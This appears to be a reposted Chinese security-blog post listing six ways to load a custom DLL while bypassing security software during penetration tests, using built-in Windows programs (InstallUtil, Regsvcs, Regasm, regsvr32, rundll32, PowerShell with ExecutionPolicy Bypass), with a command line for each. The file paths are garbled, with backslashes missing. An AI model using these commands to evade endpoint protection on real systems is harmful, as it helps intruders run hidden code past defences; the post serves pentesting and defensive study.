六种bypass安全软件防护执行的方式
2020-04-17 12:25:31 Author: www.secpulse.com(查看原文) 阅读量:330 收藏
在渗透测试过程中,总是会遇到各种各种的安全防护。下面通过系统自带的程序来绕过安全防护,加载我们自己想要的DLL文件:
主要有:

  1. InstallUtil.exe

  2. Regsvcs.exe

  3. Regasm.exe

  4. Regsvr 32.exe

  5. Rundll32.exe

  6. Powershell

详细用法如下:

1.
x86
C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
x64
C:WindowsMicrosoft.NETFramework64v4.0.3031964InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

2.
x86
C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe AllTheThings.dll

x64

C:WindowsMicrosoft.NETFramework64v4.0.30319regsvcs.exe AllTheThings.dll

3.

x86
C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U AllTheThings.dll

x64

C:WindowsMicrosoft.NETFramework64v4.0.30319regasm.exe /U AllTheThings.dll
4.
x86
regsvr 32 /s /u AllTheThings.dll --> Calls DllUnregisterServer

x64

regsvr 32 /s AllTheThings.dll --> Calls DllRegisterServer
5.
rundll32 AllTheThings.dll,EntryPoint
6.

直接使用powershell,加载powershell模块,具体使用的方式如下:

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
官方网站:www.ms08067.com

本文作者:Ms08067安全实验室

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/128621.html


文章来源: https://www.secpulse.com/archives/128621.html
如有侵权请联系:admin#unsafe.sh